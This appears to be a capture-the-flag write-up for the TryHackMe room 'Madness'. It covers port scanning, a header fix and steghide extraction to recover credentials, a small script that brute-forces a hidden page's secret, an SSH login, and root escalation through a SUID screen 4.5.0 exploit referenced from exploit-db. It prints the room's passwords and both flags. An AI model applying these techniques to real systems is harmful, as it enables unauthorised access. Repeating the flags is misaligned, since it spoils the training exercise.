Madness
In this post, we will look into the room “Madness” from TryHackMe, which can be found on https://tryhackme.com
#1 - user.txt
Hint: There’s something ROTten about this guys name!
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA) | 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA) |_ 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Have a close look at the Apache2 Ubuntu default page, it has been modified:
$ curl -s http://10.10.109.114
[REDACTED]
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="thm.jpg" class="floating_element"/>
<!-- They will never find me-->
<span class="floating_element">
Apache2 Ubuntu Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
[REDACTED]
The file header (89 50 4e 47 0d 0a 1a 0a) indicates that the file is a PNG while the extension is *.jpg.
$ wget http://10.10.109.114/thm.jpg $ xxd thm.jpg | head 00000000: 8950 4e47 0d0a 1a0a 0000 0001 0100 0001 .PNG............ 00000010: 0001 0000 ffdb 0043 0003 0202 0302 0203 .......C........ 00000020: 0303 0304 0303 0405 0805 0504 0405 0a07 ................ 00000030: 0706 080c 0a0c 0c0b 0a0b 0b0d 0e12 100d ................ 00000040: 0e11 0e0b 0b10 1610 1113 1415 1515 0c0f ................ 00000050: 1718 1614 1812 1415 14ff db00 4301 0304 ............C... 00000060: 0405 0405 0905 0509 140d 0b0d 1414 1414 ................ 00000070: 1414 1414 1414 1414 1414 1414 1414 1414 ................ 00000080: 1414 1414 1414 1414 1414 1414 1414 1414 ................ 00000090: 1414 1414 1414 1414 1414 1414 1414 ffc0 ................
Let’s replace the header to match with a jpg:
$ printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01' | dd conv=notrunc of=thm.jpg bs=1

The picture discloses a hidden location:
$ curl -s http://10.10.109.114/th1s_1s_h1dd3n/ <html> <head> <title>Hidden Directory</title> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body> <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here--> <p>Secret Entered: </p> <p>That is wrong! Get outta here!</p> </div> </body> </html>
Based on the comment, we can guess that the page expects a number to be provided as argument:
$ curl -s http://10.10.109.114/th1s_1s_h1dd3n/?secret=34 <html> <head> <title>Hidden Directory</title> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body> <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here--> <p>Secret Entered: 34</p> <p>That is wrong! Get outta here!</p> </div> </body> </html>
OK, let’s script it in python:
#!/usr/bin/env python3
import requests
host = '10.10.109.114'
url = 'http://{}/th1s_1s_h1dd3n/?secret={}'
for i in range(100):
r = requests.get(url.format(host, i))
if not 'That is wrong!' in r.text:
print("Found secret: {}".format(i))
print(r.text)
Here is the output of the script:
$ python secret.py Found secret: 73 <html> <head> <title>Hidden Directory</title> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body> <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here--> <p>Secret Entered: 73</p> <p>Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B</p> </div> </body> </html>
Looks like we have a password (y2RPJ4QaPF!B) but no user name. And we are instructed not to brute force the SSH. I first tried a few usernames that I found relevant, but none was working:
- th1s_1s_h1dd3n
- th1s_1s_h1dd3n-73
- th1s_1s_h1dd3n_73
- madness
- madness73
- madness_73
- madness-73
- thm
- thm73
- thm_73
- thm-73
- seventythree
- seventy_three
- seventy-three
Then I saw the hint (There's something ROTten about this guys name!) and thought there might be something else to get from the picture.
Nothing with binwalk, but steghide was luckier (use the password found as key):
$ steghide info thm.jpg
"thm.jpg":
format: jpeg
capacity: 1.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hidden.txt":
size: 101.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf thm.jpg
Enter passphrase:
wrote extracted data to "hidden.txt".
$ cat hidden.txt
Fine you found the password!
Here's a username
wbxre
I didn't say I would make it easy for you!
Now, let’s ROT13 this username:
$ echo -n "wbxre" | tr 'A-Za-z' 'N-ZA-Mn-za-m' joker
I tried to connect as joker with the password, but no luck. I also tried to ROT13 the password, no luck either…
I’ll be honest, I was about to stop here and searched in one of the available writeups. I found that the password is located in the picture of this room…. Seriously, who would expect that? Anyway, let’s take this as a hint (it would maybe make sense to add a hint BTW).
Use steghide (with empty key) to reveal the password:
$ wget https://i.imgur.com/5iW7kC8.jpg
$ steghide info 5iW7kC8.jpg
"5iW7kC8.jpg":
format: jpeg
capacity: 6.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "password.txt":
size: 83.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf 5iW7kC8.jpg
Enter passphrase:
wrote extracted data to "password.txt".
$ cat password.txt
I didn't think you'd find me! Congratulations!
Here take my password
*axA&GF8dP
Great, now we have a valid user and password.
$ sshpass -p "*axA&GF8dP" ssh joker@10.10.109.114
joker@ubuntu:~$ pwd
/home/joker
joker@ubuntu:~$ cat user.txt
THM{d5781e53b130efe2f94f9b0354a5e4ea}
User flag: THM{d5781e53b130efe2f94f9b0354a5e4ea}
#2 - root.txt
User has not sudo privileges, but there are interesting programs owned by root with the SUID bit set:
joker@ubuntu:~$ /bin/bash joker@ubuntu:~$ find / -user root -perm -u=s 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/bin/vmware-user-suid-wrapper /usr/bin/gpasswd /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/sudo /bin/fusermount /bin/su /bin/ping6 /bin/screen-4.5.0 /bin/screen-4.5.0.old /bin/mount /bin/ping /bin/umount joker@ubuntu:~$ ls -l /bin/screen* lrwxrwxrwx 1 root root 12 Jan 4 14:03 /bin/screen -> screen-4.5.0 -rwsr-xr-x 1 root root 1588648 Jan 4 14:03 /bin/screen-4.5.0 -rwsr-xr-x 1 root root 1588648 Jan 4 13:59 /bin/screen-4.5.0.old lrwxrwxrwx 1 root root 12 Jan 4 13:59 /bin/screen.old -> screen-4.5.0
Let’s find a way to leverage a root privilege with screen version 4.5.0 (https://www.exploit-db.com/exploits/41154). Download the exploit, transfer it to the target in /tmp and execute it. For an unknown reason, the exploit failed to execute for me:
$ sh 41154.sh ~ gnu/screenroot ~ [+] First, we create our shell and library...
I analyzed it and created the /tmp/libhax.c and rootshell.c files myself, and compiled them. It worked this way.
# cat /root/root.txt
THM{5ecd98aa66a6abb670184d7547c8124a}